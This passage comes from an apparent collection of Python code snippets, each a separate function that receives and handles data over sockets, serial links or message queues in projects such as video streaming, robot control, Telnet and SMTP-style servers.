data[self.payload_size :]\n msg_size = struct.unpack(\"Q\", packed_msg_size)[0]\n # receiving concrete data\n while len(data) < msg_size:\n data += self.client_socket.recv(4 * 1024)\n # getting all data for current state\n data_recv_pickled = data[:msg_size]\n # setting data to whats left for next state\n data = data[msg_size:]\n # unpickle what we got\n data_recv = pickle.loads(data_recv_pickled)\n # show image and if q pressed - stop\n cv2.imshow(\"RECEIVING VIDEO\", data_recv.frame)\n print(\n f\"[CLIENT] GOT IMAGE AT TIME: {data_recv.decision} | WITH PERCENTAGE: {data_recv.percentage}% | DELAY: {datetime.datetime.now() - data_recv.time_sended}\"\n )\n key = cv2.waitKey(1) & 0xFF\n if key == ord(\"q\"):\n break\n # disconnect from server\n self.disconnect()", "def run(self):\n inputs = [self.server]\n\n while self.running:\n print '1'\n try:\n readable, writeable, exceptional = \\\n select.select(inputs, [], [])\n except select.error, e:\n print 'select:error[%s]' % e.message\n break\n\n for sock in readable:\n print '2'\n if sock == self.server:\n client, address = self.server.accept()\n client.setblocking(0)\n inputs.append(client)\n # self.outputs.append(client)\n\n print 'Client[%s] connected!' 
% address[0]\n self.clients[client] = address[0]\n\n else:\n print '3'\n self.recv_data(sock)", "def listen_to_connection(self, conn):\n with conn:\n print(\"Connected\")\n while self.running:\n data = conn.recv(32)\n if not data: \n return\n \n print(\"Recived Data:\"+str(data))\n self.__update(data)", "def __async_read_callback(self, data, err) -> None:\n if err != 0:\n logging.info('async_read (1): disconnected')\n self.close()\n elif not data:\n logging.info('async_read (2): disconnected')\n self.close()\n elif self.__is_active:\n # Push incoming data through Telnet Option Parser.\n self.receive_buffer.clear()\n for byte in data:\n # Add parsed text data\n return_byte = self.__telnet_parser.iac_sniffer(bytes([byte]))\n if return_byte is not None:\n # logging.info('byte received: {byte}'.format(byte=return_byte))\n # bytes_parsed = bytes_parsed + return_byte\n self.receive_buffer.append(return_byte)\n\n # Data other than Telnet Options, then send back to client. or push through system!!\n if len(self.receive_buffer) > 0:\n # This should now be pushed through for\n # Input on the STATE instead of echoed back!\n logging.info(\"Echo %s\", self.receive_buffer)\n self.async_write(b''.join(self.receive_buffer))\n\n # Ready for next set of incoming data\n self.wait_for_async_data()", "def handle(self):\n global latest_status\n data = self.request[0]\n socket = self.request[1]\n logging.info(\"Received {} bytes from {}\".format(len(data), self.client_address[0]))\n jss = interface.joystick_status_pb2.JoystickStatus()\n jss.ParseFromString(data)\n sent = jss.sent.ToDatetime()\n if not latest_status:\n latest_status = jss\n else:\n if latest_status.sent.ToDatetime() < sent:\n latest_status = jss\n else:\n logging.warning(\"Discarded stray package.\")\n ack = interface.joystick_status_pb2.JoystickAck()\n ack.sent.CopyFrom(jss.sent)\n ack.received.GetCurrentTime()\n response = ack.SerializeToString()\n socket.sendto(response, self.client_address)", "def run(self):\n\n print('Listening for client connections...')\n\n while not self.shutdownEvent.is_set():\n readyToRead, readyToWrite, inputError = select.select(self._socketList, [], [], self._selectTimeout)\n\n # Iterate over input sockets\n for sock in readyToRead:\n # Received new connection request\n if sock is self._serverSocket:\n print('Received connection request. 
Establishing connection with client.')\n\n # Accept the connection and append it to the socket list\n clientSocket, address = self._serverSocket.accept()\n\n #TODO: Add this if there's a timeout blocking issue, or make the sockets non-blocking\n #clientSocket.settimeout(0.5)\n\n self._socketListMutex.acquire()\n\n try:\n self._socketList.append(clientSocket)\n finally:\n self._socketListMutex.release()\n # Received message from client\n else:\n # Read a message off of the socket\n msgData = MessageHandler.recvMsg(sock)\n\n # Process the message\n if msgData is not None:\n self.__processMsg(sock, msgData)\n # The client disconnected\n else:\n print('Client disconnected')\n\n self._socketListMutex.acquire()\n\n try:\n self._socketList.remove(sock)\n finally:\n self._socketListMutex.release()\n\n sock.close()\n\n # Cleanup\n self.__shutdown()", "def listen(self):\n\n\t\twhile self.running:\n\t\t\t#Wait for server to inform you there is data\n\t\t\tself.rxEvt.wait()\n\t\t\t\n\t\t\ttry:\n\t\t\t\t#See if recieved packet is actually latest from client\n\t\t\t\tif self.rxData[len(self.rxData)-1][0] >= self.rxLatest:\n\n\t\t\t\t\t#Update latest and pass data to data handler\n\t\t\t\t\tself.rxLatest = self.rxData[len(self.rxData)-1][0]\n\t\t\t\t\tself.handleRecvData(self.rxData[len(self.rxData)-1][1])\n\t\t\n\t\t\t\t\t#Clear event object so other clientHandlers begin waiting again\n\t\t\t\t\tself.rxEvt.clear()\n\n\t\t\texcept IndexError, e:\n\t\t\t\tprint(\"Index error on ServerClient listen\\nCarrying on Regardless\")", "def run(self):\n to_client_request_thread = threading.Thread(target=self._dispatch_to_client_request, daemon=True)\n to_client_request_thread.start()\n\n from_client_request_thread = threading.Thread(target=self._dispatch_from_client_request, daemon=True)\n from_client_request_thread.start()\n\n from_client_commands_thread = threading.Thread(target=self._from_client_commands, daemon=True)\n from_client_commands_thread.start()\n\n to_client_update_state_thread = threading.Thread(target=self._to_client_update_state, daemon=True)\n to_client_update_state_thread.start()\n\n server_control_thread = threading.Thread(target=self._server_control, daemon=True)\n server_control_thread.start()\n\n # Wait for threads to finish\n to_client_request_thread.join()\n from_client_request_thread.join()\n from_client_commands_thread.join()\n to_client_update_state_thread.join()\n server_control_thread.join()\n \n # Close server connection\n self._to_client_request.close()\n self._from_client_request.close()", "def data_received(self, data):\n # This may seem strange; feeding all bytes received to the **writer**,\n # and, only if they test positive, duplicating to the **reader**.\n #\n # The writer receives a copy of all raw bytes because, as an IAC\n # interpreter, it may likely **write** a responding reply.\n self._last_received = datetime.datetime.now()\n\n cmd_received = False\n for byte in data:\n try:\n recv_inband = self.writer.feed_byte(bytes([byte]))\n except:\n self._log_exception(logger.warning, *sys.exc_info())\n else:\n if recv_inband:\n # forward to reader (shell).\n self.reader.feed_data(bytes([byte]))\n\n # becomes True if any out of band data is received.\n cmd_received = cmd_received or not recv_inband\n\n # until negotiation is complete, re-check negotiation aggressively\n # upon receipt of any command byte.\n if not self._waiter_connected.done() and cmd_received:\n self._check_negotiation_timer()", "def runner(socket,id):\n socket.send('proceed')\n \n while True:\n data = 
socket.recv()\n print(\"id(\",id,\")=\",data)\n if not data: break\n \n elif data == \"info\":\n run_time = time.ctime(start_time)\n statusMessage = \"SERVER STATUS: Running...\\nInterface id:\"+str(id)+\"\\nBeen running since: \"+str(run_time)+\"\\n\"\n socket.send(statusMessage)\n \n elif data == \"plug\": #talk to plugin? aka. other commands \n pass\n \n else: #not valid command.\n socket.send(\"invalid command\")\n \n socket.close() \n print(\"closed connection\") #means the thread is also quitting", "def start(self):\n\t\twhile True:\n\t\t\tmensaje_servidor = \">>SERVIDOR:\"\n\t\t\tself.s.listen()\n\t\t\tprint(mensaje_servidor + \"ESPERANDO POR CLIENTES CTRL-C PARA TERMINAR EJECUCIÓN\")\n\t\t\tself.CONEXION, direccion = self.s.accept()\n\t\t\tprint(mensaje_servidor + \"CONEXIÓN RECIBIDA DE \" + str(direccion))\n\t\t\twhile True:\n\t\t\t\tmensaje_cliente = self.recibir_mensaje()\n\t\t\t\tif mensaje_cliente.startswith(\"download\"):\n\t\t\t\t\tself.enviar_mensaje(self.hacer_lista())\n\t\t\t\t\tnombre_archivo = self.recibir_mensaje().split(\":\")[1]\n\t\t\t\t\tself.enviar_archivo(nombre_archivo)\n\t\t\t\telif mensaje_cliente.startswith(\"load\"):\n\t\t\t\t\tnombre_archivo = mensaje_cliente.split(\":\")[1]\n\t\t\t\t\tself.recibir_archivo(nombre_archivo)\n\t\t\t\telif mensaje_cliente.startswith(\"list:\"):\n\t\t\t\t\tself.enviar_mensaje(self.hacer_lista())\n\t\t\t\telif mensaje_cliente == \"stop\":\n\t\t\t\t\tbreak", "def handleClient(self, connection, address):\r\n # time.sleep(5) #server Action\r\n while True:\r\n try:\r\n data = connection.recv(1024).decode(\"utf-8\")\r\n except:\r\n print('client disconnect: ', address, 'at', self.now())\r\n data = \"\"\r\n\r\n if not data: break\r\n\r\n data = self.change_host(data, address)\r\n result = self.manag_bd.dispatcher(data)\r\n\r\n mutex = thread.allocate_lock()\r\n\r\n\r\n if type(result)==type(list()):\r\n mutex.acquire() #Lock interrupt\r\n l = len(result)\r\n reply = str(l)\r\n connection.send(reply.encode(\"utf-8\"))\r\n for line in result:\r\n time.sleep(0.0025)\r\n reply = line\r\n connection.send(reply.encode(\"utf-8\"))\r\n mutex.release()# permission to interrupt\r\n else:\r\n reply = str(self.now())\r\n connection.send(reply.encode(\"utf-8\"))\r\n\r\n\r\n\r\n connection.close()", "def _listen(self):\n if not self.is_connected:\n self.connect()\n\n while True:\n data = self.recv()\n ping = PING_RE.match(data)\n if ping:\n self.handle_ping(ping.group(1))\n else:\n result = self.handle_message(data)\n\n if result:\n print(result)\n\n time.sleep(1)", "def run(self):\n self.debug(__name__ + \".run(): self.threadName=\" + str(self.threadName) + \"\\n\")\n self.debug(__name__ + \".run(): self.statusFile=\" + str(self.statusFile) + \"\\n\")\n self.debug(__name__ + \".run(): self.recvData=\" + str(self.recvData) + \"\\n\")\n self.debug(__name__ + \".run(): self.socketConn=\" + str(self.socketConn) + \"\\n\")\n\n status = True\n data = self.getFileData()\n self.mySocketObj.serverSend(self.socketConn, data)\n if self.socketConn: self.socketConn.close()\n # self.updateCounts()\n self.status = status\n if status:\n self.appendMsg(__name__ + \".run(): Completed successfully for \" + str(self.threadName) + \"\\n\")\n else:\n self.appendMsg(__name__ + \".run(): Failed for \" + str(self.threadName) + \"\\n\")\n # Endif", "def run(self):\n\n print(\"Running server on address: {}, port: {}\".format(self.ip_address, self.port))\n self.setup_for_run()\n\n try:\n read_list = [self.server]\n select_timeout = 1\n while True:\n # receive a connection 
request from client and get conn, addrr tuple\n readable, _, _= select.select(read_list, [], [], select_timeout)\n if self.server in readable:\n conn, addr = self.server.accept()\n # log connnection confirmation message\n print(addr[0] + \" connected\")\n # start a new client thread with the new conn and address, and create new struct\n self.addr_to_conn_struct_map[addr] = ConnStruct(conn, self.start_new_thread(conn, addr))\n # process msgs in queue\n self.process_queue()\n\n except KeyboardInterrupt:\n pass\n finally:\n self.shutting_down.set()\n # clean up all known client connections and threads\n for addr in self.addr_to_conn_struct_map:\n self.clean(addr, keep=True)\n print(\"Exiting Server Process, waiting for clients cleanup\")\n # wait for client threads to get the message and clean their sht\n time.sleep(1)\n # close server connection\n self.server.close()\n print(\"Done!\")", "def run_server(self):\n print('Starting socket server (host {}, port {})'.format(self.host, self.port))\n\n client_sock, client_addr = self.sock.accept()\n\n print('Client {} connected'.format(client_addr))\n\n stop = False\n while not stop:\n if client_sock:\n # Check if the client is still connected and if data is available:\n try:\n rdy_read, rdy_write, sock_err = select.select([client_sock,], [], [])\n except select.error:\n print('Select() failed on socket with {}'.format(client_addr))\n return 1\n\n if len(rdy_read) > 0:\n read_data = client_sock.recv(255)\n # Check if socket has been closed\n if len(read_data) == 0:\n print('{} closed the socket.'.format(client_addr))\n stop = False # True\n client_sock, client_addr = self.sock.accept()\n print(\"New connection opened\")\n else:\n print('>>> Received: {}'.format(read_data.rstrip()))\n if read_data.rstrip() == 'quit':\n stop = False #True\n else:\n if read_data == 'right':\n self.moveRight(0.5)\n elif read_data == 'left':\n self.moveLeft(0.5)\n elif read_data == 'forward':\n self.moveForward(0.5)\n self.setGPIO(0,0,0,0,.01)\n client_sock.send(read_data)\n else:\n print(\"No client is connected, SocketServer can't receive data\")\n #stop = True\n time.delay(1)\n client_sock, client_addr = self.sock.accept()\n print(\"New connection opened\")\n\n # Close socket\n print('Closing connection with {}'.format(client_addr))\n client_sock.close()\n return 0", "def run_server(self):\n self.establish_connection()\n while True:\n self.receive_data(self.conn)", "def cmd_handler():\n context = zmq.Context()\n\n # socket to receive commands (a subscription to ELECTION_CODE channel)\n cmd_socket = context.socket(zmq.SUB)\n cmd_socket.connect (\"tcp://%s:5556\" % SERVER_HOST)\n topicfilter = \"politiche2013\"\n cmd_socket.setsockopt(zmq.SUBSCRIBE, topicfilter)\n\n # socket to send replies\n reply_sender = context.socket(zmq.PUSH)\n reply_sender.connect(\"tcp://%s:5557\" % SERVER_HOST)\n\n # main loop\n while True:\n print \"Aye sir, unit {0} ready for your commands ...\".format(computer_id)\n # wait for a command\n string = cmd_socket.recv()\n\n # action\n print \"Message received: '%s'\" % (string,)\n\n # send reply to server\n print \"Sending reply to server\"\n reply = { 'unit' : computer_id, 'status' : 'configured'}\n reply_sender.send_json(reply)", "def run(self):\n print(\"Client: Started\", flush=True)\n ack = Packet()\n ack_data = b''\n\n request = \"download\"\n req_pkt = Packet(0, request)\n req_packed = req_pkt.pkt_pack()\n\n self.client_socket.sendto(req_packed, self.server_addr)\n\n ack_data = self.client_socket.recv(self.pkt_size)\n 
ack.pkt_unpack(ack_data)\n\n self.recv_img(self.img_save_to)\n\n ack = Packet()\n ack_data = b''\n request = \"upload\"\n req_pkt = Packet(0, request)\n req_packed = req_pkt.pkt_pack()\n\n self.client_socket.sendto(req_packed, self.server_addr)\n\n ack_data = self.client_socket.recv(self.pkt_size)\n ack.pkt_unpack(ack_data)\n\n self.send_img(self.img_to_send)\n\n sleep(5)\n\n ack = Packet()\n ack_data = b''\n request = \"exit\"\n req_pkt = Packet(0, request)\n req_packed = req_pkt.pkt_pack()\n\n self.client_socket.sendto(req_packed, self.server_addr)\n\n ack_data = self.client_socket.recv(self.pkt_size)\n ack.pkt_unpack(ack_data)\n\n print(\"Client: Exiting...\")\n # close socket when finished\n self.client_socket.close()", "def run(self):\n self.cncLock.acquire()\n self.running = True\n\n # Initialize\n try:\n self.cnc = serial.Serial(self.deviceFile,BAUD_RATE)\n\n self.updaterThread = threading.Thread(target=self.periodic_timer)\n self.updaterThread.start()\n\n # Wake up grbl\n log.info(\"Initializing Grbl...\")\n cmd = \"\\r\\n\\r\\n\"\n self.cnc.write(cmd.encode())\n\n # Wait for grbl to initialize and flush startup text in serial input\n time.sleep(2)\n self.cnc.flushInput()\n self.cncLock.release()\n\n while self.running :\n cmd = self.commandQueue.get().strip() + EOLStr\n if self.running == False:\n break\n self.cncLock.acquire()\n self.cnc.write(cmd.encode())\n\n out = str(self.cnc.readline().strip()) # Wait for grbl response\n if out.find('ok') >= 0 :\n log.debug(f'MSG: {out}') # Debug response\n elif out.find('error') >= 0 :\n log.error(f'ERROR: {out}')\n else:\n log.info(out)\n self.cncLock.release()\n except:\n raise\n finally:\n log.debug(\"CNC main loop left\")\n self.cnc.close()", "def dataReceived(self,data):\n if DEBUG: print \"class CommandProtocol, function dataReceived\"\n if data[6:12] == \"status\":\n print self.server.xstatus()\n self.transport.write(\"<XML>\"+self.server.xstatus()+\"</XML>\")\n self.transport.loseConnection()\n return\n if DEBUG and len(data) < 10000: print \"data:\", data\n # on receipt of the first fragment determine message length, extract header info\n # NOTE: this can only handle header lengths smaller than the fragment size - \n # the header MUST arrive in the first fragment\n # append the new data \n self.alldata += data\n if u\"?console\" in data: self.provide_console()\n #requests = 0 #For use with priorities\n if not hasattr(self,'mlength'):\n # attempt to extract the header info with the current message subset\n try: \n self.dataHTTP = HTTPRequest(self.alldata)\n self.boundary = self.dataHTTP.headers['content-type'].split('boundary=')[-1]\n fb = data.find('--' + self.boundary) # find the first used boundary string\n if fb == -1:\n return # if there is none, the header must not be complete\n # if there is a boundary, header must be complete; get header data\n self.mlength = fb + int(self.dataHTTP.headers.dict['content-length'])\n headerItemsforCommand = ['host','origin','referer']\n self.request = {k: self.dataHTTP.headers[k] for k in headerItemsforCommand if k in self.dataHTTP.headers}\n self.request.update({'ctime':self.ctime,'protocol':self})\n # record where this request is coming from\n self.factory.connection_manager.elaborateLog(self,self.request)\n except: return # if unsuccessful, wait for next packet and try again\n \n # if we made it to here, the header has been received\n # if the entirety of message not yet received, append this fragment and continue\n if self.mlength > len(self.alldata):\n return\n # if we have made it here, 
this is last fragment of message \n # mark the 'all data received' time\n self.request.update({'timereceived':time.time()})\n # strip multipart data from incoming HTTP request\n kv = [datas.split('name=\"')[-1].split('\"\\n\\r\\n\\r') for datas in self.alldata.split('--'+self.boundary+'--')]\n self.params = {k:v.rstrip() for k,v in kv[:-1]}\n # insert request, if valid, into command queue (persistently resides in self.Factory) \n #pdb.set_trace()\n #SC=SocketCommand(self.params,self.request)\n SC=commands.SocketCommand(self.params,self.request, self.server.command_library)#CP 2014-10-28\n try:\n self.factory.connection_manager.server.command_queue.add(SC)\n #self.factory.commandQueue.add(SC)\n except AttributeError:\n if DEBUG: print 'Failed to insert SocketCommand in Queue, No Queue'\n raise\n #self.factory.commandQueue=CommandQueue(SC)\n except:\n if DEBUG: print \"Error No command included in request\", SC\n msg = {'Not_Command_text_message':'Failed to insert SocketCommand in Queue, reason unknown','terminator':'die'}\n self.transport.write(simplejson.dumps(msg, ensure_ascii = False).encode('utf8'))\n if DEBUG: print 'Failed to insert SocketCommand in Queue, reason unknown'\n self.transport.loseConnection()\n raise", "def datagram_received(self, data: bytes, addr: AddressType):\n try:\n hdr = PacketHeader.deserialize(data)\n payload = data[hdr.LENGTH :]\n except ValueError:\n # Nothing we can do, packet cannot be decoded.\n return\n\n # Filter replies\n if hdr.is_reply:\n return\n\n # Check for an RST.\n if hdr.flags & PacketFlags.RST:\n # Disconnect active client.\n if addr in self._clients:\n self.disconnect_client(addr, False)\n return\n\n # Non RST, continuation of previous session or new connection.\n cid = hdr.client_id.value\n\n # New connection.\n if not cid:\n if addr in self._clients:\n # Delete stale connection for the same network address.\n self.disconnect_client(addr, False)\n\n skel = self._skel_fac(addr)\n # Generate random CID to avoid collisions with previously connected clients.\n cid = random.randint(u32.min() + 1, u32.max())\n self._clients[addr] = cid, ConnectedClient(\n caddr=addr,\n skel=skel,\n transport=self._transport,\n timeout_callback=self.disconnect_client,\n inactivity_timeout=self._inactivity_timeout,\n result_cache_timeout=self._result_cache_timeout,\n )\n\n # Register and send new CID\n rep = PacketHeader(\n client_id=u32(cid), flags=(PacketFlags.REPLY | PacketFlags.CHANGE_CID)\n )\n self._transport.sendto(rep.serialize(), addr)\n return\n\n # Existing connection\n if addr not in self._clients:\n # Unknown client\n # Client thinks it's using an open connection but server\n # has no record of that connection. Reset to signal that.\n self._send_rst(addr)\n return\n\n scid, cclient = self._clients[addr]\n if scid != cid:\n # Unknown client, also one that thinks it's using an open connection\n # but server also doesn't have a record of that connection. 
Reset.\n # todo: need to notify servers of shutdown!\n self.disconnect_client(addr)\n return\n\n cclient.process(hdr, payload)", "def handle_client(self, conn):\r\n\r\n while True:\r\n # Receive message\r\n msg = conn.recv(1024).decode()\r\n res = self.validateCommand(msg)\r\n\r\n print(res)\r\n\r\n # Send response\r\n conn.sendall(res.encode())\r\n\r\n if msg == '/exit':\r\n break\r\n\r\n # Close client connection\r\n print('Client disconnected...')\r\n conn.close()", "def run(self): #CHANGED FROM run to start\n\n # Open socket for communication\n self.udpSock.bind(self.addr)\n # Receive communication until stopped\n while not self.close.isSet():\n data = self.udpSock.recv(self.buffer)\n self.lock.acquire()\n self.processData(data)\n self.lock.release()\n\n\n # Close socket\n self.udpSock.close()", "def run(self):\n while True:\n try:\n data = self._read()\n except IOError:\n break\n\n if len(data) == 0:\n self.finalize(\"Connection closed.\")\n break\n\n gevent.spawn(self.process_data, data)", "def run(self):\n while True:\n try:\n data = self._read()\n except IOError:\n break\n\n if len(data) == 0:\n self.finalize(\"Connection closed.\")\n break\n\n gevent.spawn(self.process_data, data)", "def start(self):\n self.build_client_snapshot()\n self.load_local_dir_state()\n\n # Operations necessary to start the daemon\n self.create_observer()\n self.observer.start()\n self.sync_with_server()\n\n self.listener_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.listener_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.listener_socket.bind((self.cfg['cmd_address'], self.cfg['cmd_port']))\n self.listener_socket.listen(self.cfg['backlog_listener_sock'])\n r_list = [self.listener_socket]\n self.daemon_state = 'started'\n self.running = 1\n polling_counter = 0\n try:\n while self.running:\n r_ready, w_ready, e_ready = select.select(r_list, [], [], self.cfg['timeout_listener_sock'])\n\n for s in r_ready:\n\n if s == self.listener_socket:\n # handle the server socket\n client_socket, client_address = self.listener_socket.accept()\n r_list.append(client_socket)\n else:\n # handle all other sockets\n length = s.recv(Daemon.INT_SIZE)\n if length:\n # i need to do [0] and cast int because the struct.unpack return a tupla like (23234234,)\n # with the length as a string\n length = int(struct.unpack('!i', length)[0])\n message = json.loads(s.recv(length))\n for cmd, data in message.items():\n if cmd == 'shutdown':\n raise KeyboardInterrupt\n self.conn_mng.dispatch_request(cmd, data)\n else:\n s.close()\n r_list.remove(s)\n\n # synchronization polling\n # makes the polling every 3 seconds, so it waits six cycle (0.5 * 6 = 3 seconds)\n # maybe optimizable but now functional\n polling_counter += 1\n if polling_counter == 6:\n self.sync_with_server()\n polling_counter = 0\n\n except KeyboardInterrupt:\n self.stop(0)\n self.observer.stop()\n self.observer.join()\n self.listener_socket.close()", "async def loop(self):\n\t\twhile self.active:\n\t\t\ttry:\n\t\t\t\tawait self.process_data(await self.websocket.recv())\n\t\t\texcept exceptions.ClientError as e:\n\t\t\t\tawait self.send(0, str(e))\n\t\t\texcept KeyboardInterrupt:\n\t\t\t\tawait self.unregister()", "def run(self):\n #setsockopt() is used to specify options on the socket.\n #Here, we set the option SO_REUSEADDR, which indicates that the system can reuse this socket\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n try:\n #associate the socket with the server address and port\n 
self.sock.bind((self.host, self.port))\n\n except socket.error as e:\n print \"Bind Error : \", e\n\n #puts the socket into server mode, The number you give to listen()\n #specifies how many connections can be queued for this socket\n self.sock.listen(1)\n\n #print socket listening state\n print('Starting socket server (host {}, port {})'.format(self.host, self.port))\n\n #loop to wait for connection\n while True:\n\n #wait for connection\n print(\"Wating for connection ... \")\n\n try:\n #accept waits for an incoming connection, returning the open connection between\n #the server and client and the address of the client\n #The connection is actually a different socket on another port (assigned by the kernel)\n self.connection, self.client_address = self.sock.accept()\n #print client connected\n print('Client {} connected'.format(self.client_address))\n\n except Exception, e:\n\t\t\t\tprint \"sock closed! Error: \",e\n\n #if connection successful, enter second loop where data exchange is done\n while True:\n #receive data\n try:\n data = self.connection.recv(self.buf_size).decode('utf-8')\n #close if exeception\n except Exception, e:\n print \"error\", e\n\n #if not data, continue receiving data\n if not data:\n print('no data')\n break\n #split data by \">\" to get commands\n data_array = data.split(\">\")\n #act depending on command received\n for data_command in data_array:\n if data_command == \"\":\n continue\n\n #GO BACKWARDS\n if Commands.CMD_FORWARD[1:] in data_command:\n print data_command + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #move forward\n self.c.forward()\n\n #GO FORWARD\n elif Commands.CMD_BACKWARD[1:] in data_command:\n print data_command + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #set the direction in which motors will spin\n self.c.writeBlock(self.c.MOTOR_LEFT_DIR,1)\n self.c.writeBlock(self.c.MOTOR_RIGHT_DIR,1)\n #increase power (PWM) supplied to the motor\n for i in range(0,500,10):\n self.c.writeBlock(self.c.MOTOR_LEFT,i)\n self.c.writeBlock(self.c.MOTOR_RIGHT,i)\n time.sleep(0.005)\n\n #TURN RIGHT\n elif Commands.CMD_TURN_RIGHT[1:] in data_command:\n #log the info\n print data_command + \" \" + str(self.c.WHEELS_ORIENTATION) + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #turn to the right the direction\n self.c.turn_right()\n #update the UI\n self.emit( SIGNAL('update_wheel_orientation_lcd(QString)'), str(self.c.WHEELS_ORIENTATION))\n\n #TURN LEFT\n elif Commands.CMD_TURN_LEFT[1:] in data_command:\n #log the info\n print data_command + \" \" + str(self.c.WHEELS_ORIENTATION) + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #turn to the right the direction\n self.c.turn_left()\n #update the UI\n self.emit( SIGNAL('update_wheel_orientation_lcd(QString)'), str(self.c.WHEELS_ORIENTATION))\n\n #STOP\n elif Commands.CMD_STOP[1:] in data_command:\n\n #print command and timestamp\n print data_command + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #stop\n self.c.stop()\n\n #ULTRASONIC TURN RIGHT\n elif Commands.CMD_ULTRASONIC_TURN_RIGHT[1:] in data_command:\n #log the info\n print data_command + \" \" + str(self.c.ULTRASONIC_ORIENTATION) + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #turn to the right the direction\n self.c.ultrasonic_right()\n #update the UI\n self.emit( SIGNAL('update_ultrasonic_orientation_lcd(QString)'), str(self.c.ULTRASONIC_ORIENTATION))\n\n #ULTRASONIC TURN RIGHT\n elif Commands.CMD_ULTRASONIC_TURN_LEFT[1:] in data_command:\n #log the info\n print 
data_command + \" \" + str(self.c.ULTRASONIC_ORIENTATION) + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #turn to the right the direction\n self.c.ultrasonic_left()\n #update the UI\n self.emit( SIGNAL('update_ultrasonic_orientation_lcd(QString)'), str(self.c.ULTRASONIC_ORIENTATION))\n\n #RED LED\n elif Commands.CMD_RGB_R[1:] in data_command:\n #print command and timestamp\n print data_command + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #turn red led ON\n self.c.turn_red_led_on()\n #update server UI\n self.emit( SIGNAL('update_led_label(QString, QString)'), \"red\", \"background-color: red\")\n\n #GREEN LED\n elif Commands.CMD_RGB_G[1:] in data_command:\n #print command and timestamp\n print data_command + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #turn green led ON\n self.c.turn_green_led_on()\n #update server UI\n self.emit( SIGNAL('update_led_label(QString, QString)'), \"green\" ,\"background-color: green\")\n\n #BLUE LED\n elif Commands.CMD_RGB_B[1:] in data_command:\n #print command and timestamp\n print data_command + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #turn blue led ON\n self.c.turn_blue_led_on()\n #update server UI\n self.emit( SIGNAL('update_led_label(QString, QString)'), \"blue\" ,\"background-color: blue\")\n\n #OFF LED\n elif Commands.CMD_RGB_OFF[1:] in data_command:\n #print command and timestamp\n print data_command + \" at \" + datetime.datetime.now().strftime(\"%H:%M:%S\")\n #turn blue led ON\n self.c.turn_led_off()\n #update server UI\n self.emit( SIGNAL('update_led_label(QString, QString)'), \"off\", \"background-color: white\")\n self.connection.close()\n break", "async def data_received(self, data):\n prefix, command, args = parse_raw_irc_command(data)\n await self.command_handler.run(command, prefix, *args)", "def handle(self):\n global log_th\n sent = 1\n msg_body = ''\n get_recv = True\n get_data = True\n empty_check = 0\n # Looping session requests\n while 1:\n try:\n # If enabled sleep feauture\n if self.sleep_between != 0:\n time.sleep(self.sleep_between)\n # If no answer feauture\n if self.no_answer != 0:\n time.sleep(1)\n continue\n # Changing receive size if receiving data part\n if sent == 3 or sent == 4:\n data = self.request.recv(self.data_recv_size)\n else:\n data = self.request.recv(self.std_recv_size)\n if sent != 5:\n self.command_w_th_inc.write_commands(\n data=bytes(data).decode().encode('ascii', 'ignore')\n .decode().rstrip(), qid=self.message_id)\n # To many empty line received, closed thread\n if self.func_empty_check(data):\n if empty_check >= 3:\n break\n else:\n empty_check += 1\n continue\n # Logging session requests if steps not equal to data section\n if sent != 5:\n log_th.log_info('{} - {} client executed : \"{}\"'.format(\n self.message_id, self.client_ip, bytes(data).decode().rstrip()))\n # Break the loop\n if self.func_quit(data):\n break\n except Exception as ae:\n log_th.log_warning('{} encounter an error from {} thread : {}'.format(\n self.client_ip, threading.current_thread().name, str(ae)))\n break\n else:\n try:\n # Checking the all steps\n if self.func_rset(data):\n sent = 2\n continue\n if self.func_auth(data):\n continue\n if self.func_auth_plain(data):\n continue\n if self.func_starttls(data):\n continue\n # Starting the sent steps\n # Ehlo/hello\n if sent == 1:\n if self.func_ehlo(data) or self.func_helo(data):\n sent += 1\n else:\n self.func_denied(self.conf_th_ic.get_item(q_key='err-messages').get('command not found'))\n # Mail from, rcpt to, data\n 
elif sent == 2:\n if bytes(data).decode().encode('ascii', 'ignore').decode().rstrip().splitlines().__len__() > 2:\n get_data = False\n get_recv = False\n elif bytes(data).decode().encode('ascii',\n 'ignore').decode().rstrip().splitlines().__len__() > 1:\n get_recv = False\n if self.func_from(data, get_recv):\n sent += 1\n else:\n self.func_denied(self.conf_th_ic.get_item(q_key='err-messages').get('mail from'))\n if not get_recv:\n if self.func_to(data, get_recv, get_data):\n sent += 1\n get_recv = True\n else:\n self.func_denied(self.conf_th_ic.get_item(q_key='err-messages').get('rcpt to'))\n if not get_data:\n if self.func_data(data, get_recv, get_data):\n sent += 1\n get_data = True\n else:\n self.func_denied(self.conf_th_ic.get_item(q_key='err-messages').get('data'))\n # rcpt to and data\n elif sent == 3:\n if bytes(data).decode().encode('ascii', 'ignore').decode().rstrip().splitlines().__len__() > 1:\n get_data = False\n if self.func_to(data, get_recv, get_data):\n sent += 1\n else:\n self.func_denied(self.conf_th_ic.get_item(q_key='err-messages').get('rcpt to'))\n if not get_data:\n if self.func_data(data, get_recv, get_data):\n sent += 1\n get_data = True\n else:\n self.func_denied(self.conf_th_ic.get_item(q_key='err-messages').get('data'))\n # data\n elif sent == 4:\n if self.func_to(data, get_recv, get_data):\n continue\n if self.func_data(data, get_recv, get_data):\n sent += 1\n else:\n self.func_denied(self.conf_th_ic.get_item(q_key='err-messages').get('data'))\n # content writing to file (if enabled) and quit statement\n elif sent == 5:\n data_list = bytes(data).decode().split('\\r\\n')\n for line in data_list:\n if str(line) == '.':\n if self.mail_save_enable != 0:\n out_file = open(self.mail_save_path + '/'\n + self.message_id + '.eml', 'w')\n out_file.write(msg_body)\n out_file.close()\n self.func_data_ok()\n sent = 1\n break\n else:\n msg_body += str(line) + '\\r\\n'\n except IndexError:\n if sent == 2:\n 